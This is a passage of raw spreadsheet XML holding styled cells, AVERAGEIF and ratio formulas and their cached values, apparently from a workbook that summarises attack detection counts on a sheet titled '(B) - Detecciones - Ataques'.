      <c r="ER111" s="271"/>
      <c r="ES111" s="271"/>
      <c r="ET111" s="271"/>
      <c r="EU111" s="271"/>
      <c r="EV111" s="271"/>
      <c r="EW111" s="271"/>
      <c r="EX111" s="271"/>
      <c r="EY111" s="271"/>
      <c r="EZ111" s="271"/>
      <c r="FA111" s="280"/>
    </row>
    <row r="112">
      <c r="J112" s="277"/>
      <c r="K112" s="500">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!BM3:BM139)</f>
        <v>2.213838631</v>
      </c>
      <c r="L112" s="501">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!DC3:DC139)</f>
        <v>190.5944205</v>
      </c>
      <c r="M112" s="501">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!ES3:ES139)</f>
        <v>406.6609951</v>
      </c>
      <c r="N112" s="502">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!GI3:GI139)</f>
        <v>1734.569727</v>
      </c>
      <c r="O112" s="278"/>
      <c r="Q112" s="271"/>
      <c r="R112" s="352" t="s">
        <v>2584</v>
      </c>
      <c r="S112" s="501">
        <f t="shared" ref="S112:V112" si="151">IF(S$35=0,"-",S64/S$35)</f>
        <v>0.0004840271055</v>
      </c>
      <c r="T112" s="501" t="str">
        <f t="shared" si="151"/>
        <v>-</v>
      </c>
      <c r="U112" s="501">
        <f t="shared" si="151"/>
        <v>0.007936507937</v>
      </c>
      <c r="V112" s="501">
        <f t="shared" si="151"/>
        <v>0</v>
      </c>
      <c r="W112" s="501">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="X112" s="501">
        <f t="shared" ref="X112:AF112" si="152">IF(X$35=0,"-",X64/X$35)</f>
        <v>0</v>
      </c>
      <c r="Y112" s="501">
        <f t="shared" si="152"/>
        <v>0</v>
      </c>
      <c r="Z112" s="501">
        <f t="shared" si="152"/>
        <v>0.06680042488</v>
      </c>
      <c r="AA112" s="501">
        <f t="shared" si="152"/>
        <v>0</v>
      </c>
      <c r="AB112" s="501">
        <f t="shared" si="152"/>
        <v>0.04347826087</v>
      </c>
      <c r="AC112" s="501">
        <f t="shared" si="152"/>
        <v>0.1</v>
      </c>
      <c r="AD112" s="501">
        <f t="shared" si="152"/>
        <v>0</v>
      </c>
      <c r="AE112" s="501">
        <f t="shared" si="152"/>
        <v>0</v>
      </c>
      <c r="AF112" s="502">
        <f t="shared" si="152"/>
        <v>0.03896103896</v>
      </c>
      <c r="AG112" s="271"/>
      <c r="AH112" s="352" t="s">
        <v>2584</v>
      </c>
      <c r="AI112" s="518">
        <f t="shared" ref="AI112:DJ112" si="153">IF(AI$30=0,"-",AI64/AI$31)</f>
        <v>0</v>
      </c>
      <c r="AJ112" s="518">
        <f t="shared" si="153"/>
        <v>1</v>
      </c>
      <c r="AK112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="AL112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="AM112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="AN112" s="518" t="str">
        <f t="shared" si="153"/>
        <v>-</v>
      </c>
      <c r="AO112" s="518" t="str">
        <f t="shared" si="153"/>
        <v>-</v>
      </c>
      <c r="AP112" s="518" t="str">
        <f t="shared" si="153"/>
        <v>-</v>
      </c>
      <c r="AQ112" s="518">
        <f t="shared" si="153"/>
        <v>0.008547008547</v>
      </c>
      <c r="AR112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="AS112" s="518" t="str">
        <f t="shared" si="153"/>
        <v>-</v>
      </c>
      <c r="AT112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="AU112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="AV112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="AW112" s="518" t="str">
        <f t="shared" si="153"/>
        <v>-</v>
      </c>
      <c r="AX112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="AY112" s="518" t="str">
        <f t="shared" si="153"/>
        <v>-</v>
      </c>
      <c r="AZ112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="BA112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="BB112" s="518" t="str">
        <f t="shared" si="153"/>
        <v>-</v>
      </c>
      <c r="BC112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="BD112" s="518" t="str">
        <f t="shared" si="153"/>
        <v>-</v>
      </c>
      <c r="BE112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="BF112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="BG112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="BH112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="BI112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="BJ112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="BK112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="BL112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="BM112" s="518">
        <f t="shared" si="153"/>
        <v>0.1719319563</v>
      </c>
      <c r="BN112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="BO112" s="518" t="str">
        <f t="shared" si="153"/>
        <v>-</v>
      </c>
      <c r="BP112" s="518" t="str">
        <f t="shared" si="153"/>
        <v>-</v>
      </c>
      <c r="BQ112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="BR112" s="518" t="str">
        <f t="shared" si="153"/>
        <v>-</v>
      </c>
      <c r="BS112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="BT112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="BU112" s="518" t="str">
        <f t="shared" si="153"/>
        <v>-</v>
      </c>
      <c r="BV112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="BW112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="BX112" s="518" t="str">
        <f t="shared" si="153"/>
        <v>-</v>
      </c>
      <c r="BY112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="BZ112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="CA112" s="518" t="str">
        <f t="shared" si="153"/>
        <v>-</v>
      </c>
      <c r="CB112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="CC112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="CD112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="CE112" s="518" t="str">
        <f t="shared" si="153"/>
        <v>-</v>
      </c>
      <c r="CF112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="CG112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="CH112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="CI112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="CJ112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="CK112" s="518">
        <f t="shared" si="153"/>
        <v>1</v>
      </c>
      <c r="CL112" s="518" t="str">
        <f t="shared" si="153"/>
        <v>-</v>
      </c>
      <c r="CM112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="CN112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="CO112" s="518">
        <f t="shared" si="153"/>
        <v>0.1666666667</v>
      </c>
      <c r="CP112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="CQ112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="CR112" s="518" t="str">
        <f t="shared" si="153"/>
        <v>-</v>
      </c>
      <c r="CS112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="CT112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="CU112" s="518" t="str">
        <f t="shared" si="153"/>
        <v>-</v>
      </c>
      <c r="CV112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="CW112" s="518" t="str">
        <f t="shared" si="153"/>
        <v>-</v>
      </c>
      <c r="CX112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="CY112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="CZ112" s="518" t="str">
        <f t="shared" si="153"/>
        <v>-</v>
      </c>
      <c r="DA112" s="518" t="str">
        <f t="shared" si="153"/>
        <v>-</v>
      </c>
      <c r="DB112" s="518" t="str">
        <f t="shared" si="153"/>
        <v>-</v>
      </c>
      <c r="DC112" s="518" t="str">
        <f t="shared" si="153"/>
        <v>-</v>
      </c>
      <c r="DD112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="DE112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="DF112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="DG112" s="518" t="str">
        <f t="shared" si="153"/>
        <v>-</v>
      </c>
      <c r="DH112" s="518">
        <f t="shared" si="153"/>
        <v>0.04</v>
      </c>
      <c r="DI112" s="518">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="DJ112" s="519">
        <f t="shared" si="153"/>
        <v>0</v>
      </c>
      <c r="DK112" s="271"/>
      <c r="DO112" s="279"/>
      <c r="DP112" s="271"/>
      <c r="DQ112" s="271"/>
      <c r="DR112" s="271"/>
      <c r="DS112" s="271"/>
      <c r="DT112" s="271"/>
      <c r="DU112" s="271"/>
      <c r="DV112" s="271"/>
      <c r="DW112" s="271"/>
      <c r="DX112" s="271"/>
      <c r="DY112" s="271"/>
      <c r="DZ112" s="271"/>
      <c r="EA112" s="271"/>
      <c r="EB112" s="271"/>
      <c r="EC112" s="271"/>
      <c r="ED112" s="280"/>
      <c r="EG112" s="279"/>
      <c r="EH112" s="271"/>
      <c r="EI112" s="271"/>
      <c r="EJ112" s="271"/>
      <c r="EK112" s="271"/>
      <c r="EL112" s="271"/>
      <c r="EM112" s="271"/>
      <c r="ER112" s="271"/>
      <c r="ES112" s="271"/>
      <c r="ET112" s="271"/>
      <c r="EU112" s="271"/>
      <c r="EV112" s="271"/>
      <c r="EW112" s="271"/>
      <c r="EX112" s="271"/>
      <c r="EY112" s="271"/>
      <c r="EZ112" s="271"/>
      <c r="FA112" s="280"/>
    </row>
    <row r="113">
      <c r="J113" s="277"/>
      <c r="K113" s="434"/>
      <c r="L113" s="353"/>
      <c r="M113" s="353"/>
      <c r="N113" s="354"/>
      <c r="O113" s="278"/>
      <c r="Q113" s="271"/>
      <c r="R113" s="352" t="s">
        <v>2585</v>
      </c>
      <c r="S113" s="501">
        <f t="shared" ref="S113:V113" si="154">IF(S$35=0,"-",S65/S$35)</f>
        <v>0.01161665053</v>
      </c>
      <c r="T113" s="501" t="str">
        <f t="shared" si="154"/>
        <v>-</v>
      </c>
      <c r="U113" s="501">
        <f t="shared" si="154"/>
        <v>0.8571428571</v>
      </c>
      <c r="V113" s="501">
        <f t="shared" si="154"/>
        <v>0.8947368421</v>
      </c>
      <c r="W113" s="501">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="X113" s="501">
        <f t="shared" ref="X113:AF113" si="155">IF(X$35=0,"-",X65/X$35)</f>
        <v>0</v>
      </c>
      <c r="Y113" s="501">
        <f t="shared" si="155"/>
        <v>0</v>
      </c>
      <c r="Z113" s="501">
        <f t="shared" si="155"/>
        <v>0.06715449074</v>
      </c>
      <c r="AA113" s="501">
        <f t="shared" si="155"/>
        <v>0.0144092219</v>
      </c>
      <c r="AB113" s="501">
        <f t="shared" si="155"/>
        <v>0.7391304348</v>
      </c>
      <c r="AC113" s="501">
        <f t="shared" si="155"/>
        <v>0.2</v>
      </c>
      <c r="AD113" s="501">
        <f t="shared" si="155"/>
        <v>0.005970149254</v>
      </c>
      <c r="AE113" s="501">
        <f t="shared" si="155"/>
        <v>0.2083333333</v>
      </c>
      <c r="AF113" s="502">
        <f t="shared" si="155"/>
        <v>0.9978354978</v>
      </c>
      <c r="AG113" s="271"/>
      <c r="AH113" s="352" t="s">
        <v>2585</v>
      </c>
      <c r="AI113" s="518">
        <f t="shared" ref="AI113:DJ113" si="156">IF(AI$30=0,"-",AI65/AI$31)</f>
        <v>0.001688073394</v>
      </c>
      <c r="AJ113" s="518">
        <f t="shared" si="156"/>
        <v>1</v>
      </c>
      <c r="AK113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="AL113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="AM113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="AN113" s="518" t="str">
        <f t="shared" si="156"/>
        <v>-</v>
      </c>
      <c r="AO113" s="518" t="str">
        <f t="shared" si="156"/>
        <v>-</v>
      </c>
      <c r="AP113" s="518" t="str">
        <f t="shared" si="156"/>
        <v>-</v>
      </c>
      <c r="AQ113" s="518">
        <f t="shared" si="156"/>
        <v>0.8974358974</v>
      </c>
      <c r="AR113" s="518">
        <f t="shared" si="156"/>
        <v>0.25</v>
      </c>
      <c r="AS113" s="518" t="str">
        <f t="shared" si="156"/>
        <v>-</v>
      </c>
      <c r="AT113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="AU113" s="518">
        <f t="shared" si="156"/>
        <v>1</v>
      </c>
      <c r="AV113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="AW113" s="518" t="str">
        <f t="shared" si="156"/>
        <v>-</v>
      </c>
      <c r="AX113" s="518">
        <f t="shared" si="156"/>
        <v>1</v>
      </c>
      <c r="AY113" s="518" t="str">
        <f t="shared" si="156"/>
        <v>-</v>
      </c>
      <c r="AZ113" s="518">
        <f t="shared" si="156"/>
        <v>0.5</v>
      </c>
      <c r="BA113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="BB113" s="518" t="str">
        <f t="shared" si="156"/>
        <v>-</v>
      </c>
      <c r="BC113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="BD113" s="518" t="str">
        <f t="shared" si="156"/>
        <v>-</v>
      </c>
      <c r="BE113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="BF113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="BG113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="BH113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="BI113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="BJ113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="BK113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="BL113" s="518">
        <f t="shared" si="156"/>
        <v>1</v>
      </c>
      <c r="BM113" s="518">
        <f t="shared" si="156"/>
        <v>0.1719319563</v>
      </c>
      <c r="BN113" s="518">
        <f t="shared" si="156"/>
        <v>0.0003861003861</v>
      </c>
      <c r="BO113" s="518" t="str">
        <f t="shared" si="156"/>
        <v>-</v>
      </c>
      <c r="BP113" s="518" t="str">
        <f t="shared" si="156"/>
        <v>-</v>
      </c>
      <c r="BQ113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="BR113" s="518" t="str">
        <f t="shared" si="156"/>
        <v>-</v>
      </c>
      <c r="BS113" s="518">
        <f t="shared" si="156"/>
        <v>1</v>
      </c>
      <c r="BT113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="BU113" s="518" t="str">
        <f t="shared" si="156"/>
        <v>-</v>
      </c>
      <c r="BV113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="BW113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="BX113" s="518" t="str">
        <f t="shared" si="156"/>
        <v>-</v>
      </c>
      <c r="BY113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="BZ113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="CA113" s="518" t="str">
        <f t="shared" si="156"/>
        <v>-</v>
      </c>
      <c r="CB113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="CC113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="CD113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="CE113" s="518" t="str">
        <f t="shared" si="156"/>
        <v>-</v>
      </c>
      <c r="CF113" s="518">
        <f t="shared" si="156"/>
        <v>1</v>
      </c>
      <c r="CG113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="CH113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="CI113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="CJ113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="CK113" s="518">
        <f t="shared" si="156"/>
        <v>1</v>
      </c>
      <c r="CL113" s="518" t="str">
        <f t="shared" si="156"/>
        <v>-</v>
      </c>
      <c r="CM113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="CN113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="CO113" s="518">
        <f t="shared" si="156"/>
        <v>0.1666666667</v>
      </c>
      <c r="CP113" s="518">
        <f t="shared" si="156"/>
        <v>0.5</v>
      </c>
      <c r="CQ113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="CR113" s="518" t="str">
        <f t="shared" si="156"/>
        <v>-</v>
      </c>
      <c r="CS113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="CT113" s="518">
        <f t="shared" si="156"/>
        <v>0.005988023952</v>
      </c>
      <c r="CU113" s="518" t="str">
        <f t="shared" si="156"/>
        <v>-</v>
      </c>
      <c r="CV113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="CW113" s="518" t="str">
        <f t="shared" si="156"/>
        <v>-</v>
      </c>
      <c r="CX113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="CY113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="CZ113" s="518" t="str">
        <f t="shared" si="156"/>
        <v>-</v>
      </c>
      <c r="DA113" s="518" t="str">
        <f t="shared" si="156"/>
        <v>-</v>
      </c>
      <c r="DB113" s="518" t="str">
        <f t="shared" si="156"/>
        <v>-</v>
      </c>
      <c r="DC113" s="518" t="str">
        <f t="shared" si="156"/>
        <v>-</v>
      </c>
      <c r="DD113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="DE113" s="518">
        <f t="shared" si="156"/>
        <v>1</v>
      </c>
      <c r="DF113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="DG113" s="518" t="str">
        <f t="shared" si="156"/>
        <v>-</v>
      </c>
      <c r="DH113" s="518">
        <f t="shared" si="156"/>
        <v>1</v>
      </c>
      <c r="DI113" s="518">
        <f t="shared" si="156"/>
        <v>0</v>
      </c>
      <c r="DJ113" s="519">
        <f t="shared" si="156"/>
        <v>1</v>
      </c>
      <c r="DK113" s="271"/>
      <c r="DO113" s="279"/>
      <c r="DP113" s="271"/>
      <c r="DQ113" s="271"/>
      <c r="DR113" s="271"/>
      <c r="DS113" s="271"/>
      <c r="DT113" s="271"/>
      <c r="DU113" s="271"/>
      <c r="DV113" s="271"/>
      <c r="DW113" s="271"/>
      <c r="DX113" s="271"/>
      <c r="DY113" s="271"/>
      <c r="DZ113" s="271"/>
      <c r="EA113" s="271"/>
      <c r="EB113" s="271"/>
      <c r="EC113" s="271"/>
      <c r="ED113" s="280"/>
      <c r="EG113" s="279"/>
      <c r="EH113" s="271"/>
      <c r="EI113" s="271"/>
      <c r="EJ113" s="271"/>
      <c r="EK113" s="271"/>
      <c r="EL113" s="271"/>
      <c r="EM113" s="271"/>
      <c r="ER113" s="271"/>
      <c r="ES113" s="271"/>
      <c r="ET113" s="271"/>
      <c r="EU113" s="271"/>
      <c r="EV113" s="271"/>
      <c r="EW113" s="271"/>
      <c r="EX113" s="271"/>
      <c r="EY113" s="271"/>
      <c r="EZ113" s="271"/>
      <c r="FA113" s="280"/>
    </row>
    <row r="114">
      <c r="J114" s="277"/>
      <c r="K114" s="352" t="s">
        <v>2564</v>
      </c>
      <c r="L114" s="403" t="s">
        <v>2565</v>
      </c>
      <c r="M114" s="403" t="s">
        <v>2566</v>
      </c>
      <c r="N114" s="404" t="s">
        <v>2567</v>
      </c>
      <c r="O114" s="278"/>
      <c r="Q114" s="271"/>
      <c r="R114" s="352" t="s">
        <v>2586</v>
      </c>
      <c r="S114" s="501">
        <f t="shared" ref="S114:V114" si="157">IF(S$35=0,"-",S66/S$35)</f>
        <v>0.01161665053</v>
      </c>
      <c r="T114" s="501" t="str">
        <f t="shared" si="157"/>
        <v>-</v>
      </c>
      <c r="U114" s="501">
        <f t="shared" si="157"/>
        <v>0.8650793651</v>
      </c>
      <c r="V114" s="501">
        <f t="shared" si="157"/>
        <v>0.8947368421</v>
      </c>
      <c r="W114" s="501">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="X114" s="501">
        <f t="shared" ref="X114:AF114" si="158">IF(X$35=0,"-",X66/X$35)</f>
        <v>0.3636363636</v>
      </c>
      <c r="Y114" s="501">
        <f t="shared" si="158"/>
        <v>0.1428571429</v>
      </c>
      <c r="Z114" s="501">
        <f t="shared" si="158"/>
        <v>0.06739053464</v>
      </c>
      <c r="AA114" s="501">
        <f t="shared" si="158"/>
        <v>0.9625360231</v>
      </c>
      <c r="AB114" s="501">
        <f t="shared" si="158"/>
        <v>0.8260869565</v>
      </c>
      <c r="AC114" s="501">
        <f t="shared" si="158"/>
        <v>0.7</v>
      </c>
      <c r="AD114" s="501">
        <f t="shared" si="158"/>
        <v>0.005970149254</v>
      </c>
      <c r="AE114" s="501">
        <f t="shared" si="158"/>
        <v>0.2083333333</v>
      </c>
      <c r="AF114" s="502">
        <f t="shared" si="158"/>
        <v>0.9978354978</v>
      </c>
      <c r="AG114" s="271"/>
      <c r="AH114" s="352" t="s">
        <v>2586</v>
      </c>
      <c r="AI114" s="518">
        <f t="shared" ref="AI114:DJ114" si="159">IF(AI$30=0,"-",AI66/AI$31)</f>
        <v>0.001688073394</v>
      </c>
      <c r="AJ114" s="518">
        <f t="shared" si="159"/>
        <v>1</v>
      </c>
      <c r="AK114" s="518">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="AL114" s="518">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="AM114" s="518">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="AN114" s="518" t="str">
        <f t="shared" si="159"/>
        <v>-</v>
      </c>
      <c r="AO114" s="518" t="str">
        <f t="shared" si="159"/>
        <v>-</v>
      </c>
      <c r="AP114" s="518" t="str">
        <f t="shared" si="159"/>
        <v>-</v>
      </c>
      <c r="AQ114" s="518">
        <f t="shared" si="159"/>
        <v>0.905982906</v>
      </c>
      <c r="AR114" s="518">
        <f t="shared" si="159"/>
        <v>0.25</v>
      </c>
      <c r="AS114" s="518" t="str">
        <f t="shared" si="159"/>
        <v>-</v>
      </c>
      <c r="AT114" s="518">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="AU114" s="518">
        <f t="shared" si="159"/>
        <v>1</v>
      </c>
      <c r="AV114" s="518">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="AW114" s="518" t="str">
        <f t="shared" si="159"/>
        <v>-</v>
      </c>
      <c r="AX114" s="518">
        <f t="shared" si="159"/>
        <v>1</v>
      </c>
      <c r="AY114" s="518" t="str">
        <f t="shared" si="159"/>
        <v>-</v>
      </c>
      <c r="AZ114" s="518">
        <f t="shared" si="159"/>
        <v>0.5</v>
      </c>
      <c r="BA114" s="518">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="BB114" s="518" t="str">
        <f t="shared" si="159"/>
        <v>-</v>
      </c>
      <c r="BC114" s="518">
        <f t="shared" si="159"/>
        <v>0.6666666667</v>
      </c>
      <c r="BD114" s="518" t="str">
        <f t="shared" si="159"/>
        <v>-</v>
      </c>
      <c r="BE114" s="518">
        <f t="shared" si="159"/>
        <v>1</v>
      </c>
      <c r="BF114" s="518">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="BG114" s="518">
        <f t="shared" si="159"/>
        <v>1</v>
      </c>
      <c r="BH114" s="518">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="BI114" s="518">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="BJ114" s="518">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="BK114" s="518">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="BL114" s="518">
        <f t="shared" si="159"/>
        <v>1</v>
      </c>
      <c r="BM114" s="518">
        <f t="shared" si="159"/>
        <v>0.1725394897</v>
      </c>
      <c r="BN114" s="518">
        <f t="shared" si="159"/>
        <v>0.0003861003861</v>
      </c>
      <c r="BO114" s="518" t="str">
        <f t="shared" si="159"/>
        <v>-</v>
      </c>
      <c r="BP114" s="518" t="str">
        <f t="shared" si="159"/>
        <v>-</v>
      </c>
      <c r="BQ114" s="518">
        <f t="shared" si="159"/>
        <v>1</v>
      </c>
      <c r="BR114" s="518" t="str">
        <f t="shared" si="159"/>
        <v>-</v>
      </c>
      <c r="BS114" s="518">
        <f t="shared" si="159"/>
        <v>1</v>
      </c>
      <c r="BT114" s="518">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="BU114" s="518" t="str">
        <f t="shared" si="159"/>
        <v>-</v>
      </c>
      <c r="BV114" s="518">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="BW114" s="518">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="BX114" s="518" t="str">
        <f t="shared" si="159"/>
        <v>-</v>
      </c>
      <c r="BY114" s="518">
        <f t="shared" si="159"/>
        <v>0.1111111111</v>
      </c>
      <c r="BZ114" s="518">
        <f t="shared" si="159"/>
        <v>1</v>
      </c>
      <c r="CA114" s="518" t="str">
        <f t="shared" si="159"/>
        <v>-</v>
      </c>
      <c r="CB114" s="518">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="CC114" s="518">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="CD114" s="518">
        <f t="shared" si="159"/>
        <v>1</v>
      </c>
      <c r="CE114" s="518" t="str">
        <f t="shared" si="159"/>
        <v>-</v>
      </c>
      <c r="CF114" s="518">
        <f t="shared" si="159"/>
        <v>1</v>
      </c>
      <c r="CG114" s="518">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="CH114" s="518">
        <f t="shared" si="159"/>
        <v>1</v>
      </c>
      <c r="CI114" s="518">
        <f t="shared" si="159"/>
        <v>1</v>
      </c>
      <c r="CJ114" s="518">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="CK114" s="518">
        <f t="shared" si="159"/>
        <v>1</v>
      </c>
      <c r="CL114" s="518" t="str">
        <f t="shared" si="159"/>
        <v>-</v>
      </c>
      <c r="CM114" s="518">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="CN114" s="518">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="CO114" s="518">
        <f t="shared" si="159"/>
        <v>1</v>
      </c>
      <c r="CP114" s="518">
        <f t="shared" si="159"/>
        <v>0.5</v>
      </c>
      <c r="CQ114" s="518">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="CR114" s="518" t="str">
        <f t="shared" si="159"/>
        <v>-</v>
      </c>
      <c r="CS114" s="518">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="CT114" s="518">
        <f t="shared" si="159"/>
        <v>0.005988023952</v>
      </c>
      <c r="CU114" s="518" t="str">
        <f t="shared" si="159"/>
        <v>-</v>
      </c>
      <c r="CV114" s="518">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="CW114" s="518" t="str">
        <f t="shared" si="159"/>
        <v>-</v>
      </c>
      <c r="CX114" s="518">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="CY114" s="518">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="CZ114" s="518" t="str">
        <f t="shared" si="159"/>
        <v>-</v>
      </c>
      <c r="DA114" s="518" t="str">
        <f t="shared" si="159"/>
        <v>-</v>
      </c>
      <c r="DB114" s="518" t="str">
        <f t="shared" si="159"/>
        <v>-</v>
      </c>
      <c r="DC114" s="518" t="str">
        <f t="shared" si="159"/>
        <v>-</v>
      </c>
      <c r="DD114" s="518">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="DE114" s="518">
        <f t="shared" si="159"/>
        <v>1</v>
      </c>
